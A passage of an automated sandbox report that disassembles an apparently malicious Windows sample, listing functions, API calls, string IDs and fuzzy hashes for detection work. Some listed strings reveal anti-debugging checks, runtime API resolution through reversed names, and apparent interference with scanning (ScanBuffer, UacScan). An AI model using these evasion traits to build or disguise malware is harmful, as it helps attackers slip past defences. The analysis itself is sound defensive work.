                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                          • API String ID: 667068680-1372893251
                                                                                                                                                                          • Opcode ID: 2861626efa1d2682bf18ed6cb77b60c4ee1e45a8390ac19ec517398c94af87ce
                                                                                                                                                                          • Instruction ID: ed100110e4a4ba152137df0b6448eb56eab3f7ec192cfa396681f844e04b9c50
                                                                                                                                                                          • Opcode Fuzzy Hash: 2861626efa1d2682bf18ed6cb77b60c4ee1e45a8390ac19ec517398c94af87ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 86016275A4430CAFEB05EFA5DC95EAE77EEFBC9B10F514864F900D7680D770A9109A10
                                                                                                                                                                          Function 0290A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0290AA67,?,?,00000000), ref: 0290A9E8
                                                                                                                                                                            • Part of subcall function 0290A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0290AA67,?,?,00000000), ref: 0290AA18
                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0290AA23
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0290AA67,?,?,00000000), ref: 0290AA41
                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0290AA4C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                          • Opcode ID: e14e993b141b04f0e8ffb90aa57c1d3bf06a7ab512d3d2e85918526129f95dce
                                                                                                                                                                          • Instruction ID: b8546bfa202e89d9dc33977e5960c85ad7eff7986e63bfeda4b138bebf7f0fe5
                                                                                                                                                                          • Opcode Fuzzy Hash: e14e993b141b04f0e8ffb90aa57c1d3bf06a7ab512d3d2e85918526129f95dce
                                                                                                                                                                          • Instruction Fuzzy Hash: E601A23564034C6FF701A6B5CDD2B6E739EDBC6B20F910160F710E6AC0D6649E109AA4
                                                                                                                                                                          Function 0290AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0290AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0290AAAF
                                                                                                                                                                            • Part of subcall function 0290A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                                                          • Opcode ID: 7494f12883e96198ebf3cb9e60f5f3fac1096a80f0d450c41515345dfeb6caf8
                                                                                                                                                                          • Instruction ID: 2a228821d8f7b609f3d826efc405f444e39c3245faaf612ad490d4b3762df4e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 7494f12883e96198ebf3cb9e60f5f3fac1096a80f0d450c41515345dfeb6caf8
                                                                                                                                                                          • Instruction Fuzzy Hash: A741D17170432D4FD711ABB988C07BEB3EBDBC5300B515929D762C73C4EA68ED468AA1
                                                                                                                                                                          Function 02918018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc
                                                                                                                                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                          • API String ID: 1883125708-1952140341
                                                                                                                                                                          • Opcode ID: 2c99438aa3baebe399a679eb71500dbb97fbd2143b9caedcacb5478af850daf2
                                                                                                                                                                          • Instruction ID: c05d33086018fbe4b533f46c015b500da1622b74a05d99d31c6b5fc3f5b7d647
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c99438aa3baebe399a679eb71500dbb97fbd2143b9caedcacb5478af850daf2
                                                                                                                                                                          • Instruction Fuzzy Hash: 20F06D34A4430CAFF700EBA5DC85EAE77EDFB8AB407910964F90093680E730AD10AA64
                                                                                                                                                                          Function 0291EFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,0291F3CC,UacInitialize,0296237C,0292B40C,UacScan,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString), ref: 0291EFCE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0291EFE0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                          • API String ID: 1646373207-2367923768
                                                                                                                                                                          • Opcode ID: 96c10e6b3022fad54936bccd6aca046042a973026d483549ec77dbc7ffe9d69d
                                                                                                                                                                          • Instruction ID: 7fd4876f7597c2c70a9fa0a30f275a2810274e17087d36473515fee7d821c9d5
                                                                                                                                                                          • Opcode Fuzzy Hash: 96c10e6b3022fad54936bccd6aca046042a973026d483549ec77dbc7ffe9d69d
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD0126335537C1DB50077F51CC481D028C89C6529B200E30B567D61D2E667C8612110
                                                                                                                                                                          Function 0290C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0292D10B,00000000,0292D11E), ref: 0290C3FA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0290C40B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                          • Opcode ID: 6ec93d1525dc2a67836f627d63d77e645257306e2abf836b06473482e9022e9e
                                                                                                                                                                          • Instruction ID: 368ab65c99eef1795fc212e079b8e00355d4f15b13d49669994ef28c7b221b8d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ec93d1525dc2a67836f627d63d77e645257306e2abf836b06473482e9022e9e
                                                                                                                                                                          • Instruction Fuzzy Hash: B9D0A761E4438D4EF7106FF16CC167A36CCA7C4305F405936E389561C1D77164284F50
                                                                                                                                                                          Function 0290E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E217
                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E233
                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E2AA
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0290E2D3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                          • Instruction ID: 85567fdf67f5a124e5451f5e5b1241dd1a79f5ea941f8d8d193f31d6b7348fac
                                                                                                                                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                          • Instruction Fuzzy Hash: 86410775A0122D8FCB65DB98CCD0BC9B3BDEF89214F0045E5E648A7291DA30AF808F60
                                                                                                                                                                          Function 0290ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD9
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACFD
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD18
                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADAE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                          • Opcode ID: f175d80e9c355e5fbb8b0e4690b8e120bf12dbbe225fd60bedda6ede56a5748a
                                                                                                                                                                          • Instruction ID: 5abb9037c97eb014dfcd3201c7c9703fbd7740ff49d39712b9669843a64606fe
                                                                                                                                                                          • Opcode Fuzzy Hash: f175d80e9c355e5fbb8b0e4690b8e120bf12dbbe225fd60bedda6ede56a5748a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41E771A4035C9FDB21EB68C8C4BDAB7FDAB48310F0440E9A648E7281DB749F948F54
                                                                                                                                                                          Function 0290ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD9
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACFD
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD18
                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADAE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                          • Opcode ID: 55a5db16d8cf814405aa77e67bac642ffa9fdb8a62627d078e212c0db1cb6f13
                                                                                                                                                                          • Instruction ID: 26cf4da0a43d0c2bc65a069d8e91f55468f8f1ee3f3b27d1c004b7af35be53b3
                                                                                                                                                                          • Opcode Fuzzy Hash: 55a5db16d8cf814405aa77e67bac642ffa9fdb8a62627d078e212c0db1cb6f13
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E41E871A4035C9FDB21EB68CCC4BDAB7EDAB48311F0440E9A648E7291DB74AE948F54
                                                                                                                                                                          Function 02901C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7ea450874ef20a40d01b1f2c5a958157cfc3980b768b0ee0c005d1ceb8eaedde
                                                                                                                                                                          • Instruction ID: 1f720b6ab7a97901bd2605cd8b02619704c4b474b202566f73055a4bebd3cb07
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ea450874ef20a40d01b1f2c5a958157cfc3980b768b0ee0c005d1ceb8eaedde
                                                                                                                                                                          • Instruction Fuzzy Hash: 7CA1D3A67106180FD718AA7C9CC43BEB3CADBC5325F18427EE21DCB3D5EB64C9458650
                                                                                                                                                                          Function 0290946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0290955A), ref: 029094F2
                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0290955A), ref: 029094F8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                          • Opcode ID: dcec2dfc6a13505ac5c534e8473691437e2f5590584be654e5e061e24937c6a2
                                                                                                                                                                          • Instruction ID: 1ed56e1d8f8c8c9a646a7d0b7704adcdbe77b51d8ecff3296df2380d226c564f
                                                                                                                                                                          • Opcode Fuzzy Hash: dcec2dfc6a13505ac5c534e8473691437e2f5590584be654e5e061e24937c6a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 75215175A0421C9FEB11DF95C8C1AAEB3F9EF88B10F4100A5ED45D7291D7309E40CBA5
                                                                                                                                                                          Function 02918184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0291820E), ref: 029181F0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                          • API String ID: 3811539418-184458249
                                                                                                                                                                          • Opcode ID: fdddbe6c95b2fc7c89a4d2ca4a842d96569bcf3bece1d2d54b2f6bcefabbf3c8
                                                                                                                                                                          • Instruction ID: 3b1c5f2dabe80ef30bdf090a15d99f95abe57f7d7fe47cbde8daf28a86b699b2
                                                                                                                                                                          • Opcode Fuzzy Hash: fdddbe6c95b2fc7c89a4d2ca4a842d96569bcf3bece1d2d54b2f6bcefabbf3c8
                                                                                                                                                                          • Instruction Fuzzy Hash: D501AD30A4430CAFFB01EFA5DC81F6A37EEFB89B00F514860FA00C3280C634AD109A60
                                                                                                                                                                          Function 0291AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291AD90
                                                                                                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 0291ADC0
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 0291ADDF
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291ADEB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Read$Write
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3448952669-0
                                                                                                                                                                          • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                                                          • Instruction ID: d68c4dbc2454b0bd8de5f843a16fe1085dade7178d4ee6c735982c217ee3d17a
                                                                                                                                                                          • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E21AFB564161D9BDB10DF6ACC80BAE73A9EF80321F008111EE5097380EB34ED61DAA4

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:8.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:47.8%
                                                                                                                                                                          Signature Coverage:14.1%
                                                                                                                                                                          Total number of Nodes:404
                                                                                                                                                                          Total number of Limit Nodes:33
